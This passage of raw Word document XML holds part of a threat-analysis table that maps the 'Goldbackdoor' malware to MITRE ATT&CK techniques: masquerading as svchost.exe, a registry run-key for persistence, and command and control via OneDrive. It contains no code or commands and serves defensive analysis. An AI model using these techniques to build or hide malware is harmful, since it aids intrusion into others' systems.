            <w:tcW w:w="641" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BBAA69A" w14:textId="7EB6254F" w:rsidR="00EA008E" w:rsidRPr="002F01CE" w:rsidRDefault="00EA008E" w:rsidP="00EE74C6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F01CE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="616" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02964767" w14:textId="77777777" w:rsidR="00EA008E" w:rsidRPr="002F01CE" w:rsidRDefault="00EA008E" w:rsidP="00EE74C6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A3DEBA5" w14:textId="77777777" w:rsidR="00EA008E" w:rsidRPr="002F01CE" w:rsidRDefault="00EA008E" w:rsidP="00EE74C6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F01CE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1485FFC0" w14:textId="2687CEBE" w:rsidR="00EA008E" w:rsidRPr="002F01CE" w:rsidRDefault="00EC2E4B" w:rsidP="00EE74C6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-DEV/NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3516" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73B114F4" w14:textId="5569A8E5" w:rsidR="00EA008E" w:rsidRPr="00AD59F3" w:rsidRDefault="006A35A5" w:rsidP="00EE74C6">
            <w:r>
              <w:t>Second of the two deploying mechanisms noted in 12 above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B9179C" w:rsidRPr="00B9179C" w14:paraId="1E0EF1AF" w14:textId="77777777" w:rsidTr="00EC2E4B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DCA0019" w14:textId="3B51D65C" w:rsidR="00B9179C" w:rsidRPr="00B9179C" w:rsidRDefault="00B9179C" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00450CE9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1402" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6972886F" w14:textId="1AE078A0" w:rsidR="00B9179C" w:rsidRPr="00B9179C" w:rsidRDefault="00B9179C" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009E4622">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009E4622">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>000</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidRPr="009E4622">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009E4622">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93" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69E903DB" w14:textId="4D766C6E" w:rsidR="00B9179C" w:rsidRPr="00B9179C" w:rsidRDefault="00B9179C" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B9179C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1036.00</w:t>
            </w:r>
            <w:r w:rsidR="00A728DD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidRPr="00B9179C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B9179C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Masquerading&gt;:</w:t>
            </w:r>
            <w:r w:rsidR="00A728DD">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00A728DD" w:rsidRPr="00A728DD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Match Legitimate Name or Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B45DA3A" w14:textId="35C64C73" w:rsidR="00B9179C" w:rsidRPr="00B9179C" w:rsidRDefault="00B9179C" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00450CE9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="616" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31D1AB9A" w14:textId="77777777" w:rsidR="00B9179C" w:rsidRPr="00B9179C" w:rsidRDefault="00B9179C" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53B10631" w14:textId="3CEEA39B" w:rsidR="00B9179C" w:rsidRPr="00B9179C" w:rsidRDefault="00B9179C" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49475812" w14:textId="39D3C4B0" w:rsidR="00B9179C" w:rsidRPr="00B9179C" w:rsidRDefault="00EC2E4B" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3516" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="510A9550" w14:textId="4BE97937" w:rsidR="00B9179C" w:rsidRPr="00B9179C" w:rsidRDefault="00B9179C" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[8] </w:t>
            </w:r>
            <w:r w:rsidRPr="00561BB2">
              <w:t xml:space="preserve">File name typical to </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00561BB2">
              <w:t>Gold</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00561BB2">
              <w:t xml:space="preserve"> backdoor is svchost.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002F7B21" w:rsidRPr="00B857D7" w14:paraId="5077908A" w14:textId="77777777" w:rsidTr="00EC2E4B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0AE46CED" w14:textId="10DEB162" w:rsidR="002F7B21" w:rsidRDefault="00561BB2" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00450CE9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1402" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78337285" w14:textId="1324FA6D" w:rsidR="002F7B21" w:rsidRPr="00B857D7" w:rsidRDefault="00561BB2" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA00</w:t>
            </w:r>
            <w:r w:rsidR="00372C4F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3: Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2293" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68BD61E2" w14:textId="3981944A" w:rsidR="002F7B21" w:rsidRPr="00B857D7" w:rsidRDefault="00561BB2" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00561BB2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1547.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00561BB2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Boot or Logon </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00561BB2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Autostart</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00561BB2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Execution&gt;:Registry Run Keys / Startup Folder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="446107D3" w14:textId="438B3499" w:rsidR="002F7B21" w:rsidRPr="00B857D7" w:rsidRDefault="00561BB2" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="008A73DC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="616" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5975F2A2" w14:textId="77777777" w:rsidR="002F7B21" w:rsidRPr="00B857D7" w:rsidRDefault="002F7B21" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CEA078C" w14:textId="24287C43" w:rsidR="002F7B21" w:rsidRDefault="00561BB2" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59303F67" w14:textId="61D48591" w:rsidR="002F7B21" w:rsidRPr="00B857D7" w:rsidRDefault="00EC2E4B" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-PER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3516" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2AFD3F71" w14:textId="38C7532D" w:rsidR="002F7B21" w:rsidRPr="00B857D7" w:rsidRDefault="00561BB2" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00561BB2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">[8] </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00561BB2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Goldbackdoor</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00561BB2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00561BB2">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">runs itself and creates new startup key in registry with name </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00561BB2">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Gold</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00561BB2">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> backdoor and value svchost.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002F7B21" w:rsidRPr="00B857D7" w14:paraId="4934EC5B" w14:textId="77777777" w:rsidTr="00EC2E4B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FA32550" w14:textId="3EF7F5DF" w:rsidR="002F7B21" w:rsidRDefault="000D29F5" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00450CE9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1402" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20DB49DA" w14:textId="52FE1148" w:rsidR="002F7B21" w:rsidRPr="00B857D7" w:rsidRDefault="000D29F5" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00485C4E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00485C4E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00485C4E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Command and Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2293" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17ACF73B" w14:textId="166AB333" w:rsidR="002F7B21" w:rsidRPr="00B857D7" w:rsidRDefault="000D29F5" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="000D29F5">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1102.002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="000D29F5">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Web Service&gt;:Bidirectional Communication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61954D67" w14:textId="552DC3A4" w:rsidR="002F7B21" w:rsidRPr="00B857D7" w:rsidRDefault="000D29F5" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="006A35A5">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="616" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37C74062" w14:textId="77777777" w:rsidR="002F7B21" w:rsidRPr="00B857D7" w:rsidRDefault="002F7B21" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71FDD2E1" w14:textId="1691613E" w:rsidR="002F7B21" w:rsidRDefault="000D29F5" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="318FF56E" w14:textId="435DBC5B" w:rsidR="002F7B21" w:rsidRPr="00B857D7" w:rsidRDefault="00EC2E4B" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3516" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7AC741D1" w14:textId="6C8BCFF5" w:rsidR="002F7B21" w:rsidRPr="00B857D7" w:rsidRDefault="006A35A5" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Goldbackdoor</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> C&amp;C appears to be via commands placed on OneDrive account (key known to the malware)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F312C" w:rsidRPr="00ED5880" w14:paraId="654E2A55" w14:textId="77777777" w:rsidTr="00EC2E4B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44D7959E" w14:textId="06154AF7" w:rsidR="005F312C" w:rsidRPr="00F808AD" w:rsidRDefault="00322435" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A9702F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1402" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D93AE29" w14:textId="4EEDB73C" w:rsidR="005F312C" w:rsidRPr="00F808AD" w:rsidRDefault="00322435" w:rsidP="008C2E9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00322435">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00322435">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0009 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00322435">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2293" w:type="dxa"/>
          </w:tcPr>
